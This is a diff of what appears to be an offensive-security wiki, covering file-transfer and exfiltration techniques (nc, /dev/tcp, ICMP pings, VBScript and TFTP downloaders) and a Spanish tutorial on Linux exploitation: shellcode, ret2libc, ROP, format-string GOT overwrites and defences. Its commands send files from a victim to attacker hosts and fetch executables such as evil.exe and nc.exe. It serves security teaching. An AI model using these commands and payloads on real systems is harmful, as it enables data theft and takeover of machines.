+#Add to the end of /etc/samba/smb.conf this:
+[public]
+    comment = Samba on Ubuntu
+    path = /tmp/smb
+    read only = no
+    browsable = yes
+    guest ok = Yes
+#Start samba
+service smbd restart
+```
+
+Windows
+
+```bash
+CMD-Wind> \\10.10.14.14\path\to\exe
+CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
+
+WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
+WindPS-2> cd new_disk:
+```
+
+## SCP
+
+The attacker has to have SSHd running.
+
+```bash
+scp <username>@<Attacker_IP>:<directory>/<filename> 
+```
+
+## NC
+
+```bash
+nc -lvnp 4444 > new_file
+nc -vn <IP> 4444 < exfil_file
+```
+
+## /dev/tcp
+
+### Download file from victim
+
+```bash
+nc -lvnp 80 > file #Inside attacker
+cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
+```
+
+### Upload file to victim
+
+```bash
+nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
+# Inside victim
+exec 6< /dev/tcp/10.10.10.10/4444
+cat <&6 > file.txt
+```
+
+thanks to **@BinaryShadow\_**
+
+## **ICMP**
+
+```bash
+#In order to exfiltrate the content of a file via pings you can do:
+xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
+#This will 4bytes per ping packet (you could probablie increase this until 16)
+```
+
+```python
+from scapy.all import *
+#This is ippsec receiver created in the HTB machine Mischief
+def process_packet(pkt):
+    if pkt.haslayer(ICMP):
+        if pkt[ICMP].type == 0:
+            data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
+            print(f"{data.decode('utf-8')}", flush=True, end="")
+
+sniff(iface="tun0", prn=process_packet)
+```
+
+## **SMTP**
+
+If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
+
+```bash
+sudo python -m smtpd -n -c DebuggingServer :25
+```
+
+## TFTP
+
+By default in XP and 2003 \(in others it need to be explicitly added during installation\)
+
+In Kali, **start TFTP server**:
+
+```bash
+#I didn't get this options working and I prefer the python option
+mkdir /tftp
+atftpd --daemon --port 69 /tftp
+cp /path/tp/nc.exe /tftp
+```
+
+**TFTP server in python:**
+
+```bash
+pip install ptftpd
+ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
+```
+
+In **victim**, connect to the Kali server:
+
+```bash
+tftp -i <KALI-IP> get nc.exe
+```
+
+## PHP
+
+Download a file with a PHP oneliner:
+
+```bash
+echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
+```
+
+## VBScript
+
+```bash
+Attacker> python -m SimpleHTTPServer 80
+```
+
+#### Victim
+
+```bash
+echo strUrl = WScript.Arguments.Item(0) > wget.vbs
+echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
+echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
+echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
+echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
+echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
+echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
+echo Err.Clear >> wget.vbs
+echo Set http = Nothing >> wget.vbs
+echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
+echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
+echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
+echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
+echo http.Open "GET", strURL, False >> wget.vbs
+echo http.Send >> wget.vbs
+echo varByteArray = http.ResponseBody >> wget.vbs
+echo Set http = Nothing >> wget.vbs
+echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
+echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
+echo strData = "" >> wget.vbs
+echo strBuffer = "" >> wget.vbs
+echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
+echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
+echo Next >> wget.vbs
+echo ts.Close >> wget.vbs
+```
+
+```bash
+cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
+```
+
+## Debug.exe
+
+This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
+
+`Debug.exe` can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that:
+
+```text
+upx -9 nc.exe
+```
+
+Now it only weights 29 kb. Perfect. So now let's disassemble it:
+
+```text
+wine exe2bat.exe nc.exe nc.txt
+```
+
+Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
+
diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md
new file mode 100644
index 00000000..0cbfb131
--- /dev/null
+++ b/exploiting/linux-exploiting-basic-esp/README.md
@@ -0,0 +1,904 @@
+# Linux Exploiting \(Basic\) \(SPA\)
+
+## **ASLR**
+
+Aleatorización de direcciones
+
+**Desactiva aleatorizacion\(ASLR\) GLOBAL \(root\)**:  
+echo 0 &gt; /proc/sys/kernel/randomize\_va\_space  
+Reactivar aletorizacion GLOBAL: echo 2 &gt; /proc/sys/kernel/randomize\_va\_space
+
+**Desactivar para una ejecución** \(no requiere root\):  
+setarch \`arch\` -R ./ejemplo argumentos  
+setarch \`uname -m\` -R ./ejemplo argumentos
+
+**Desactivar protección de ejecución en pila**  
+gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack ejemplo.c -o ejemplo
+
+**Core file**  
+ulimit -c unlimited  
+gdb /exec core\_file  
+/etc/security/limits.conf -&gt; \*               soft    core            unlimited
+
+**Text  
+Data  
+BSS  
+Heap**
+
+**Stack**
+
+## **1.STACK OVERFLOWS**
+
+> buffer overflow, buffer overrun, stack overrun, stack smashing
+
+Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
+
+**Sección BSS**: Variables globales o estáticas sin inicializar
+
+```text
+static int i;
+```
+
+**Sección DATA**: Variables globales o estáticas inicializadas
+
+```text
+int i = 5;
+```
+
+**Sección TEXT**: Instrucciones del código \(opcodes\)
+
+**Sección HEAP**: Buffer reservados de forma dinánima \(malloc\(\), calloc\(\), realloc\(\) \)
+
+**Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\)
+
+Para obtener la dirección de una función dentro de un programa se puede hacer:
+
+```text
+objdump -d ./PROGRAMA | grep FUNCION
+```
+
+## **2.SHELLCODE**
+
+Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h \| grep “\_\_NR\_”
+
+setreuid\(0,0\); // \_\_NR\_setreuid 70  
+execve\(“/bin/sh”, args\[\], NULL\); // \_\_NR\_execve 11  
+exit\(0\); // \_\_NR\_exit 1
+
+xor eax, eax ; limpiamos eax  
+xor ebx, ebx ; ebx = 0 pues no hay argumento que pasar  
+mov al, 0x01 ; eax = 1 —&gt; \_\_NR\_exit 1  
+int 0x80 ;        Ejecutar syscall
+
+**nasm -f elf assembly.asm** —&gt; Nos devuelve un .o  
+**ld assembly.o -o shellcodeout** —&gt; Nos da un ejecutable formado por el código ensamblador y podemos sacar los opcodes con **objdump  
+objdump -d  -Mintel ./shellcodeout** —&gt; Para ver que efectivamente es nuestra shellcode y sacar los OpCodes
+
+**Comprobar que la shellcode funciona**
+
+```text
+char shellcode[] = “\x31\xc0\x31\xdb\xb0\x01\xcd\x80”
+
+void main(){
+            void (*fp) (void);
+            fp = (void *)shellcode;
+            fp();
+}<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1">​</span>
+```
+
+Para ver que las llamadas al sistema se realizan correctamente se debe compilar el programa anterior y las llamadas del sistema deben aparecer en **strace ./PROGRAMA\_COMPILADO**
+
+A la hora de crear shellcodes se puede realizar un truco. La primera instrucción es un jump a un call. El call llama al código original y además mete en el stack el EIP. Después de la instrucción call hemos metido el string que necesitásemos, por lo que con ese EIP podemos señalar al string y además continuar ejecutando el código.
+
+EJ **TRUCO \(/bin/sh\)**:
+
+```text
+jmp                 0x1f                                        ; Salto al último call
+popl                %esi                                       ; Guardamos en ese la dirección al string
+movl               %esi, 0x8(%esi)       ; Concatenar dos veces el string (en este caso /bin/sh)
+xorl                 %eax, %eax             ; eax = NULL
+movb  %eax, 0x7(%esi)     ; Ponemos un NULL al final del primer /bin/sh
+movl               %eax, 0xc(%esi)      ; Ponemos un NULL al final del segundo /bin/sh
+movl   $0xb, %eax               ; Syscall 11
+movl               %esi, %ebx               ; arg1=“/bin/sh”
+leal                 0x8(%esi), %ecx      ; arg[2] = {“/bin/sh”, “0”}
+leal                 0xc(%esi), %edx      ; arg3 = NULL
+int                    $0x80                         ; excve(“/bin/sh”, [“/bin/sh”, NULL], NULL)
+xorl                 %ebx, %ebx             ; ebx = NULL
+movl   %ebx, %eax            
+inc                   %eax                          ; Syscall 1
+int                    $0x80                         ; exit(0)
+call                  -0x24                          ; Salto a la primera instrución
+.string             \”/bin/sh\”                               ; String a usar<span id="mce_marker" data-mce-type="bookmark" data-mce-fragment="1">​</span>
+```
+
+**EJ usando el Stack\(/bin/sh\):**  
+
+
+```text
+section .text
+global _start
+_start:
+xor                  eax, eax                     ;Limpieza
+mov                al, 0x46                      ; Syscall 70
+xor                  ebx, ebx                     ; arg1 = 0
+xor                  ecx, ecx                     ; arg2 = 0
+int                    0x80                           ; setreuid(0,0)
+xor                  eax, eax                     ; eax = 0
+push   eax                             ; “\0”
+push               dword 0x68732f2f ; “//sh”
+push               dword 0x6e69622f; “/bin”
+mov                ebx, esp                     ; arg1 = “/bin//sh\0”
+push               eax                             ; Null -> args[1]
+push               ebx                             ; “/bin/sh\0” -> args[0]
+mov                ecx, esp                     ; arg2 = args[]
+mov                al, 0x0b                      ; Syscall 11
+int                    0x80                           ; excve(“/bin/sh”, args[“/bin/sh”, “NULL”], NULL)
+```
+
+**EJ FNSTENV:**
+
+```text
+fabs
+fnstenv [esp-0x0c]
+pop eax                     ; Guarda el EIP en el que se ejecutó fabs
+…
+```
+
+**Egg Huter:**
+
+Consiste en un pequeño código que recorre las páginas de memoria asociadas a un proceso en busca de la shellcode ahi guardada \(busca alguna firma puesta en la shellcode\). Útil en los casos en los que solo se tiene un pequeño espacio para inyectar código.
+
+**Shellcodes polimórficos**
+
+Consisten el shells cifradas que tienen un pequeño códigos que las descifran y saltan a él, usando el truco de Call-Pop este sería un **ejemplo cifrado cesar**:
+
+```text
+global _start
+_start:
+            jmp short magic
+init:
+            pop     esi
+            xor      ecx, ecx
+            mov    cl,0                              ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá)
+desc:
+            sub     byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar)
+            sub     cl, 1
+            jnz       desc
+            jmp     short sc
+magic:
+            call init
+sc:
+            ;Aquí va el shellcode
+```
+
+1.  **Atacando el Frame Pointer \(EBP\)**
+
+Útil en una situación en la que podemos modificar el EBP pero no el EIP.
+
+Se sabe que al salir de una función se ejecuta el siguente código ensamblador:
+
+```text
+movl               %ebp, %esp
+popl                %ebp
+ret
+```
+
+De esta forma, si se puede modificar el EBP al salir de una función \(fvuln\) que ha sido llamada por otra función, cuando la función que llamó a fvuln finalice, su EIP puede ser modificado.
+
+En fvuln se puede introducir un EBP falso que apunte a un sitio donde esté la direcciónd e la shellcode + 4 \(hay que sumarle 4 por el pop\). Así, al salir de la función, se meterá en ESP el valor de &\(&Shellcode\)+4, con el pop se le restará 4 al ESP y este apuntará a la dirección de la shellcode cuando se ejcute el ret.
+
+**Exploit:**  
+&Shellcode + "AAAA" + SHELLCODE + relleno + &\(&Shellcode\)+4
+
+**Off-by-One Exploit**  
+Se permite modificar tan solo el byte menos significativo del EBP. Se puede llevar a cabo un ataque como el anterior pero la memoria que guarda la dirección de la shellcode debe compartir los 3 primeros bytes con el EBP.
+
+## **4. Métodos return to Libc**
+
+Método útil cuando el stack no es ejecutable o deja un buffer muy pequeño para modificar.
+
+El ASLR provoca que en cada ejecución las funciones se carguen en posiciones distintas de la memoria. Por lo tanto este método puede no ser efectivo en ese caso. Para servidores remotos, como el programa está siendo ejecutado constantemente en la misma dirección sí puede ser útil.
+
+* **cdecl\(C declaration\)** Mete los argumentos en el stack y tras salir de la función limpia la pila
+* **stdcall\(standard call\)** Mete los argumentos en la pila y es la función llamada la que la limpia
+* **fastcall** Mete los dos primeros argumentos en registros y el resto en la pila
+
+Se pone la dirección de la instrucción system de libc y se le pasa como argumento el string “/bin/sh”, normalmente desde una variable de entorno. Además, se usa la dirección a la función exit para que una vez que no se requiera más la shell, salga el programa sin dar problemas \(y escribir logs\).
+
+**export SHELL=/bin/sh**
+
+Para encontrar las direcciones que necesitaremos se puede mirar dentro de **GDB:  
+p system  
+p exit  
+rabin2 -i ejecutable** —&gt; Da la dirección de todas las funciones que usa el programa al cargarse  
+\(Dentro de un start o algun breakpoint\): **x/500s $esp** —&gt; Buscamos dentro de aqui el string /bin/sh
+
+Una vez tengamos estas direcciones el **exploit** quedaría:
+
+“A” \* DISTANCIA EBP + 4 \(EBP: pueden ser 4 "A"s aunque mejor si es el EBP real para evitar fallos de segmentación\) + Dirección de **system** \(sobreescribirá el EIP\) + Dirección de **exit** \(al salir de system\(“/bin/sh”\) se llamará a esta función pues los primero 4bytes del stack son tratados como la siguiente dirección del EIP a ejecutar\) + Dirección de “**/bin/sh**” \(será el parámetro pasado a system\)
+
+De esta forma el EIP se sobreescribirá con la dirección de system la cual recibirá como parámetro el string “/bin/sh” y al salir de este ejecutará la función exit\(\).
+
+Es posible encontrarse en la situación de que algún byte de alguna dirección de alguna función sea nulo o espacio \(\x20\). En ese caso se pueden desensamblar las direcciones anteriores a dicha función pues probablemente haya varios NOPs que nos permitan poder llamar a alguno de ellos en vez de a la función directamente \(por ejemplo con &gt; x/8i system-4\).
+
+Este método funciona pues al llamar a una función como system usando el opcode **ret** en vez de **call**, la función entiende que los primeros 4bytes serán la dirección **EIP**  a la que volver.
+
+Una técnica interesante con este método es el llamar a **strncpy\(\)** para mover un payload del stack al heap y posteriormente usar **gets\(\)** para ejecutar dicho payload.
+
+Otra técnica interesante es el uso de **mprotect\(\)** la cual permite asignar los permisos deseados a cualquier parte de la memoria. Sirve o servía en BDS, MacOS y OpenBSD, pero no en linux\(controla que no se puedan otorgar a la vez permisos de escritura y ejecución\). Con este ataque se podría volver a configurar la pila como ejecutable.
+
+#### **Encadenamiento de funciones**
+
+Basándonos en la técnica anterior, esta forma de exploit consiste en:  
+Relleno + &Función1 + &pop;ret; + &arg\_fun1 + &Función2 + &pop;ret; + &arg\_fun2 + …
+
+De esta forma se pueden encadenar funciones a las que llamar. Además, si se quieren usar funciones con varios argumentos, se pueden poder los argumentos necesarios \(ej 4\) y poner los 4 argumentos y buscar dirección a un sitio con opcodes: pop, pop, pop, pop, ret —&gt; **objdump -d ejecutable**
+
+#### **Encadenamiento mediante falseo de frames \(encadenamiento de EBPs\)**
+
+Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecución de varias funciones a través del EBP y de "leave;ret"
+
+RELLENO  
++ Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: \(&system\(\) + &leave;ret + &“/bin/sh”\)  
++ En el EIP ponemos de dirección una función &\(leave;ret\)
+
+Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + &system\(\) + &\(leave;ret;\) + &”/bin/sh”
+
+el 2ºEBP sería: 3ºEBP\_falso + &system\(\) + &\(leave;ret;\) + &”/bin/ls”
+
+Esta shellcode se puede repetir indefinidamente en las partes de memoria a las que se tenga acceso de forma que se conseguirá una shellcode fácilmente divisible por pequeños trozos de memoria.
+
+\(Se encadena la ejecución de funciones mezclando las vulnerabilidades vistas anteriormente de EBP y de ret2lib\)
+
+## **5.Métodos complementarios**
+
+#### **Ret2Ret**
+
+Útil para cuando no se puede meter una dirección del stack en el EIP \(se comprueba que el EIP no contenga 0xbf\) o cuando no se puede calcular la ubicación de la shellcode. Pero, la función vulnerable acepte un parámetro \(la shellcode irá aquí\).
+
+De esta forma, al cambiar el EIP por una dirección a un **ret**, se cargará la siguiente dirección \(que es la dirección del primer argumento de la función\). Es decir, se cargará la shellcode.
+
+El exploit quedaría: SHELLCODE + Relleno \(hasta EIP\) + **&ret** \(los siguientes bytes de la pila apuntan al inicio de la shellcode pues se mete en el stack la dirección al parámetro pasado\)
+
+Al parecer funciones como **strncpy** una vez completas eliminan de la pila la dirección donde estaba guardada la shellcode imposibilitando esta técnica. Es decir, la dirección que pasan a la función como argumento \(la que guarda la shellcode\) es modificada por un 0x00 por lo que al llamar al segundo **ret** se encuentra con un 0x00 y el programa muere.
+
+            **Ret2PopRet**
+
+Si no tenemos control sobre el primer argumento pero sí sobre el segundo o el tercero, podemos sobreescribir EIP con una dirección a pop-ret o pop-pop-ret, según la que necesitemos.
+
+#### **Técnica de Murat**
+
+En linux todos los progamas se mapean comenzando en 0xbfffffff
+
+Viendo como se construye la pila de un nuevo proceso en linux se puede desarrollar un exploit de forma que programa sea arrancado en un entorno cuya única variable sea la shellcode. La dirección de esta entonces se puede calcular como: addr = 0xbfffffff - 4 - strlen\(NOMBRE\_ejecutable\_completo\) - strlen\(shellcode\)
+
+De esta forma se obtendría de forma sensilla la dirección donde está la variable de entorno con la shellcode.
+
+Esto se puede hacer gracias a que la función execle permite crear un entorno que solo tenga las variables de entorno que se deseen
+
+#### **Jump to ESP: Windows Style**
+
+Debido a que el ESP está apuntando al comienzo del stack siempre, esta técnica consiste con sustituir el EIP con la dirección a una llamada a **jmp esp** o **call esp**. De esta forma, se guarda la shellcode después de la sobreescritura del EIP ya que después de ejecutar el **ret** el ESP se encontrará apuntando a la dirección siguiente, justo donde se ha guardado la shellcode.
+
+En caso de que no se tenga el ASLR activo en Windows o Linux se puede llamar a **jmp esp** o **call esp** almacenadas en algún objeto compartido. En caso de que esté el ASLR, se podría buscar dentro del propio programa vulnerable.
+
+Además, el hecho de poder colocar la shellcode después de la corrupción del EIP en vez de en medio del stack, permite que las instrucciones push o pop que se ejecuten en medio de la función no lleguen a tocar la shellcode \(cosa que podría ocurrir en caso de ponerse en medio del stack de la función\).
+
+De forma muy similar a esto si sabemos que una función devuelve la dirección donde está guardada la shellcode se puede llamar a **call eax** o **jmp eax \(ret2eax\).**
+
+#### **ROP \(Return Oriented Programming\) o borrowed code chunks**
+
+Los trozos de código que se invocan se conocen como gadgets.
+
+Esta técnica consiste en encadenar distintas llamadas a funciones mediante la técnica de **ret2libc** y el uso de **pop,ret**.
+
+En algunas arquitecturas de procesadores cada instrucción es un conjunto de 32bits \(MIPS por ej\). Sin embargo, en Intel las instrucciones son de tamaño variable y varias instrucciones pueden compartir un conjunto de bits, por ejemplo:
+
+**movl $0xe4ff, -0x\(%ebp\)** —&gt; Contiene los bytes 0xffe4 que también se traducen por: **jmp \*%esp**
+
+De esta forma se pueden ejecutar algunas instrucciones que realmente ni si quiera está en el programa original
+
+**ROPgadget.py** nos ayuda a encontrar valores en binarios
+
+Este programa también sirve para crear los **payloads**. Le puedes dar la librería de la que quieres sacar los ROPs y él generará un payload en python al cual tu le das la dirección en la que está dicha librería y el payload ya está listo para ser usado como shellcode. Además, como usa llamadas al sistema no ejecuta realmente nada en el stack sino que solo va guardando direcciones de ROPs que se ejecutarán mediante **ret**. Para usar este payload hay que llamar al payload mediante una instrucción **ret**.
+
+#### **Integer overflows**
+
+Este tipo de overflows se producen cuando una variable no está preparada para soportar un número tan grande como se le pasa, posiblemente por una confusión entre variables con y sin signo, por ejemplo:
+
+```text
+#include <stdion.h>
+#include <string.h>
+#include <stdlib.h>
+
+int main(int argc, char *argv[]){
+int len;
+unsigned int l;
+char buffer[256];
+int i;
+len = l = strtoul(argv[1], NULL, 10);
+printf(“\nL = %u\n”, l);
+printf(“\nLEN = %d\n”, len);
+if (len >= 256){
+printf(“\nLongitus excesiva\n”);
+exit(1);
+}
+if(strlen(argv[2]) < l)
+strcpy(buffer, argv[2]);
+else
+printf(“\nIntento de hack\n”);
+return 0;
+}
+```
+
+En el ejemplo anterior vemos que el programa se espera 2 parámetros. El primero la longitud de la siguiente cadena y el segundo la cadena.
+
+Si le pasamos como primer parámetro un número negativo saldrá que len &lt; 256 y pasaremos ese filtro, y además también strlen\(buffer\) será menor que l, pues l es unsigned int y será muy grande.
+
+Este tipo de overflows no busca lograr escribir algo en el proceso del programa, sino superar filtros mal diseñados para explotar otras vulnerabilidades.
+
+#### **Variables no inicializadas**
+
+No se sabe el valor que puede tomar una variable no inicializada y podría ser interesante observarlo. Puede ser que tome el valor que tomaba una variable de la función anterior y esta sea controlada por el atacante.
+
+## **6.Explotando format strings**
+
+Cuando se llama a printf se ponen los parámetros de forma ordenada.
+
+%08x —&gt; 8 bytes hexadecimales  
+%d —&gt; Entero  
+%u —&gt; Entero sin signo  
+%s —&gt; Cadena  
+%n —&gt; Bytes escritos  
+%hn —&gt; Ocupa 2 bytes en vez de 4  
+&lt;n&gt;$X —&gt; Parámetro de acceso directo —&gt; \(“%3$d”, var1, var2, var3\) —&gt; Accede directamente a var3
+
+AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.  
+AAAA.%4\$x —&gt; 4º parametro  
+AAAA%.6000x%4\$n —&gt; Se escribe 6004 en la dirección que apunta el 4º parametro  
+AAAA%6000d%4\$n —&gt; Se escribe 6004 en la dirección que apunta el 4º parametro  
+AAAA.%500\$08x —&gt; Parámetro en el offset 500
+
+**objdump -t ./exec \| grep varBss  
+objdump -TR ./exec \| grep exit\(func lib\)  
+objdump -d ./exec \| grep funcCode  
+objdump -D ./exec \| grep "VAR\_NAME"** --&gt; Direccion de memoria donde se carga una variable stática \(en la region DATA\)
+
+Con %n escribimos el número bytes escritos y normalmente podremos controlar dónde, si por ejemplo queremos escribir el valor 400 en una dirección que es el 8º parámetro:
+
+python -c ‘print “DIRECCION” ’%.396d%8\$n
+
+#### **DTOR**
+
+Los destructores son funciones que se ejecutan justo antes de la finalización de un programa.
+
+**objdump -s -j .dtors /exec  
+rabin -s /exec \| grep “\_\_DTOR”**
+
+Si se logra escribir algo en \_\_DTOR\_END\_\_ la dirección de una shellcode, esta se ejecutará a la salida del programa.
+
+Los DTOR se encuentran entre los valores ffffffff y 00000000, por lo que si no hay ningún DTOR encontraremos al ejecutar el **objdump** esos valores seguidos. Entonces, si introducimos una valor entre ambos, será tomado como lla dirección de una función y se ejecutará \(es decir, hay que sobreescribir el 00000000\).
+
+Es raro que hoy en día un binario tenga DTORs.
+
+#### **GOT \(Tabla de offsets global\) - Mejor esta que la anterior si se puede elegir**
+
+Contiene las direcciones absolutas de las funciones que son utilizadas en un programa.
+
+**objdump -s -j .got ./exec  
+\(peda\)&gt; x/20x 0xDIR\_GOT** --&gt; Se ve una lista con las direcciones de las funciones  
+**\(peda\)&gt; x/i 0xDIR\_FUNC\_GOT** --&gt; Veríamos el inicio de una función \(probablemente un push ebp\)
+
+#### **Exploit \(format strings\)**
+
+Si modificamos el valor de la dirección de una de estas funciones y apuntamos a una shellcode y esta función se ejecuta después del printf tendremos un exploit.
+
+Para escribir la dirección de una shellcode normalmente hay que escribirla en dos pasos, primero 2 bytes y luego los otros 2, para ello se usa $hn.
+
+HOB —&gt; 2bytes superiores de la dirección de la shellcode  
+LOB —&gt; 2bytes inferiores de la dirección de la shellcode
+
+Hay que escribir siempre primero el menor de \[HOB, LOB\] y luego el otro.
+
+Si HOB &lt; LOB  
+\[dirección+2\]\[direccion\]%.\[HOB-8\]x%\[offset\]\$hn%.\[LOB-HOB\]x%\[offset+1\]
+
+Si HOB &gt; LOB  
+\[dirección+2\]\[direccion\]%.\[LOB-8\]x%\[offset+1\]\$hn%.\[HOB-LOB\]x%\[offset\]
+
+HOB                                       LOB                            HOB\_shellcode-8        NºParam\_dir\_HOB      LOB\_shell-HOB\_shell         NºParam\_dir\_LOB
+
+\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+         "%.49143x"        +       "%4$hn"          +          "%.15408x"                +          "%5$hn"'\`
+
+#### **Format Strings como Buffer Overflows**
+
+La función **sprintf** copia a un string \(char \*str\) lo mismo que se le pasaría a una función printf. Es decir, si no tiene en cuenta el formato \(“%s”\), y el string introducido es dominado por el atacante, se puede introducir una cadena como %.44xAAAA —&gt; Que hará escribir 44bytes +”AAAA” en \*str y eso puede provocar un bufferoverflow.
+
+#### **Estructuras \_\_atexit \(ya no útil en general\)**
+
+atexit\(\) es una función a la cuál se le pasan como parámetros otras funciones y estas funciones se ejecutarán al ejecutarse un exit\(\) o el return del main.
+
+Si se consigue modificar la dirección de alguna de estas funciones para que apunte a un shellcode se ganaría el control del proceso, pero actualmente esto es más complicado.
+
+Actualmente las direcciones a las funciones que hay que ejecutar se esconden tras varias estructuras  y finalmente la dirección a la que apunta no son las direcciones de las funciones, sino que están cifradas con XOR y desplazamientos con una clave aleatoria. Por lo que actualmente este vector de ataque no es de mucha utilidad por lo menos en x86 y x64\_86. La función de cifrado es PTR\_MANGLE.
+
+Otras arquitecturas como m68k, mips32, mips64, aarch64, arm, hppa… No implementas la función de cifrado pues que esta devuelve lo mismo que recibió como entrada. Así que estas arquitectura sí serían atacables mediante este vector.
+
+#### **setjmp\(\) y longjmp\(\) \(ya no útil en general\)**
+
+Setjmp\(\) permite guardar el contexto \(los registros\)
+
+longjmp\(\) permite restablecer el contexto
+
+Los registros guardados son: EBX, ESI, EDI, ESP, EIP, EBP
+
+Lo que pasa es que EIP y ESP son pasados por la función PTR\_MANGLE, por lo que las arquitectura vulnerables a este ataque son las mismas que las anteriores.
+
+Son útiles para recuperación de errores o interrupciones.
+
+Sin embargo, según lo leído, no se protegen los demás registros, por lo que si dentro de la función a la que se llame hay un call ebx, call esi o call edi se puede tomar el control. O también se podría modificar EBP para modificar el ESP.
+
+#### **VTable y VPTR en C++**
+
+Cada clase tiene una Vtable que es un array de punteros a métodos.
+
+Cada objeto de una clase tiene un VPtr que es un puntero a la Viable de su clase. El VPtr forma parte de la cabecera de cada objeto, por lo que si se logra una sobreescritura del VPtr se podría modificar para que apuntase a una Viable falsa para que al ejecutar una función se fuese a la shellcode.
+
+## **Medidas preventivas y evasiones**
+
+#### **ASLR no tan aleatorio**
+
+PaX dive el espacio de direcciones del proceso en 3 grupos:
+
+Codigo y datos iniciados y no iniciados: .text, .data y .bss —&gt; 16bits de entropia en la variable delta\_exec, esta variable se inicia aleatoriamente con cada proceso y se suma a las direcciones iniciales
+
+Memoria asignada por mmap\(\) y libraries compartidas —&gt; 16bits, delta\_mmap
+
+El stack —&gt; 24bits, delta\_stack —&gt; Realmente 11 \(del byte 10º al 20º inclusive\) —&gt;alineado a 16bytes —&gt; 524.288 posibles direcciones reales del stack
+
+Las variables de entorno y los argumentos se desplazan menos que un buffer en el stack.
+
+**Return-into-printf**
+
+Es una técnica para convertir un buffer overflow en un error de cadena de formato. Consiste en sustituir el EIP para que apunte a un printf de la función y pasarle como argumento una cadena de formato manipulada para obtener valores sobre el estado del proceso.
+
+**Ataque a librerías**
+
+Las librerías están en una posición con 16bits de aleatoriedad = 65636 posibles direcciones. Si un servidor vulnerable llama a fork\(\) el espacio de direcciones de memoria es clocado en el proceso hijo y se mantiene intacto. Por lo que se puede intentar hacer un brute force a la función usleep\(\) de libc pasándole como argumento “16” de forma que cuando tarde más de lo normal en responder se habrá encontrado dicha función. Sabiendo dónde está dicha función se puede obtener delta\_mmap y calcular las demás.
+
+La única forma de estar seguros de que el ASLR funciona es usando arquitectura de 64bits. Ahí no hay ataques de fuerza bruta.
+
+#### **StackGuard y StackShield**
+
+**StackGuard** inserta antes del EIP —&gt; 0x000aff0d\(null, \n, EndOfFile\(EOF\), \r\) —&gt; Siguen siendo vulnerables recv\(\), memcpy\(\), read\(\), bcoy\(\) y no protege el EBP
+
+**StackShield** es más elaborado que StackGuard
+
+Guarda en una tabla \(Global Return Stack\) todas las direcciones EIP de vuelta de forma que el overflow no cause ningún daño. Ademas, se pueden comparar ambas direcciones para a ver si ha habido un desbordamiento.
+
+También se puede comprobar la dirección de retorno con un valor límite, así si el EIP se va a un sitio distinto del habitual como el espacio de datos se sabrá. Pero esto se sortea con Ret-to-lib, ROPs o ret2ret.
+
+Como se puede ver stackshield tampoco protege las variables locales.
+
+#### **Stack Smash Protector \(ProPolice\) -fstack-protector**
+
+Se pone el canary antes del EBP. Reordena las variables locales para que los buffers estén en las posiciones más altas y así no puedan sobreescribir otras variables.
+
+Además, realiza una copia segura de los argumentos pasados encima de la pila \(encima de las vars locales\) y usa estas copias como argumentos.
+
+No puede proteger arrays de menos de 8 elementos ni buffers que formen parte de una estructura del usuario.
+
+El canary es un número random sacado de “/dev/urandom” o sino es 0xff0a0000. Se almacena en TLS\(Thread Local Storage\). Los hilos comparten el mismo espacio de memoria, el TLS es un área que tiene variables globales o estáticas de cada hilo. Sin embargo, en ppio estas son copiadas del proceso padre aunque el proceso hijo podría modificar estos datos sin modificar los del padre ni los de los demás hijos. El problema es que si se usa fork\(\) pero no se crea un nuevo canario, entonces todos los procesos \(padre e hijos\) usan el mismo canario. En i386 se almacena en gs:0x14 y en x86\_64 se almacena en fs:0x28
+
